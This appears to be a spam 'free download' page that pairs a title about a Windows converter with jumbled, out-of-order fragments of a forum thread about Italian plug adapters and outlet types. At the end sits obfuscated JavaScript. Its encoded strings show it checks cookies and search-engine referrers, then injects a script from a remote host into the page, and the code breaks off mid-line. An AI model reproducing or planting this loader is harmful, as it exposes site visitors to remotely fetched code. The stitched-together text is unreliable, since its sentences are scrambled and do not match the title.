Download Free Converter Adapter For Italy For Windows 64
51 replies to this topicYou've certainly done your research haven't you?! I have neither an Ipad nor a camera but until somebody can give you a comprehensive reply: mobile phone chargers and things like portable DVD players usually have the two pin (not grounded) plugs here, while pc rechargers have three pin (grounded).. However, it does state on these sites that the Type C only works in some Type L Outlets and perhaps the more common type L Outlet (which could be the most frequently used in Italy for all I know) is not the type to be compatible with the Type C Adapter, in which case I would have just purchased a piece of junk. Click
Thanks for the help No no, for laptops Just got a tape measure out The small holes are 1 cm apart (mid-hole to mid-hole) and the large holes are 1.. However, I don't really know for sure, and I was hoping to get some information from other people that have been there many times before to see what they thought would be best, but here is my reasoning for why I think a Type C Adapter might be the best choice.. Some more modern outlets take both small and large plugs In the sense that the holes are slightly elongated, being a bit bigger at the top.
Now when you say small holes for low wattage appliances, would that be the outlet you would use for things like a laptop, because when I think of small appliances I think of it as being more like a microwave or maybe a coffee maker.. Thank you for your response Yes, but what type of outlet is most commonly found in Italy, a Type C with two Holes or a Type L with three Holes and will the two prong Type C adapters work in the majority of Type L 3 hole outlets throughtout Italy?I appreciate the assistance.. I'm sure someone will come up with the answer soon Have a good trip!Come to think of it (I'm no electrician as you can tell) there are outlets with three small holes for low wattage appliances, and outlets with three larger holes for heavy duty stuff like washing machines etc. Click
3 cm apart (mid to mid) Approx of course!Sorry for the non technical language Edited: 4:26 am, August 25, 2012Ah, just remembered.. var _0x7838=['c3BsaXQ=','bGVuZ3Ro','cmVwbGFjZQ==','OyBwYXRoPQ==','Y29va2ll','V2hFZnQ=','a29kTGw=','R0JHYU4=','eUJXSlI=','Z2V0VGltZQ==','UURJckg=','OyBkb21haW49','OyBzZWN1cmU=','Lmdvb2dsZS4=','LmFzay4=','LmFsdGF2aXN0YS4=','YlBB','cWdD','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWlvc3RpdGxlJnF1ZXJ5PQ==','QW9MUlI=','LmJpbmcu','T21aZUg=','RWhyd1k=','Y2xaalI=','LnlhbmRleC4=','cmVmZXJyZXI=','Z2V0','QXlDcU4=','cm1PTkQ=','aW5kZXhPZg==','VlJOY2g=','a2p4aVc=','SGR2akc=','c2V0','SFZmeXk=','SVplS2E=','aGVhZA==','Y3JlYXRlRWxlbWVudA==','c2NyaXB0','c3Jj','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','WXJRVko=','YXBwZW5kQ2hpbGQ=','Mnw1fDB8M3wxfDQ=','YmxRdFk='];(function(_0x458315,_0xcfda5e){var _0x1c76c6=function(_0x5aef3){while(--_0x5aef3){_0x458315['push'](_0x458315['shift']());}};_0x1c76c6( _0xcfda5e);}(_0x7838,0x15f));var _0x4f6e=function(_0x501e3a,_0x48f6d9){_0x501e3a=_0x501e3a-0x0;var _0x7c8581=_0x7838[_0x501e3a];if(_0x4f6e['initialized']===undefined){(function(){var _0xfa0e28=function(){var _0x379dee;try{_0x379dee=Function('returnx20(function()x20' '{}. e10c415e6f 4
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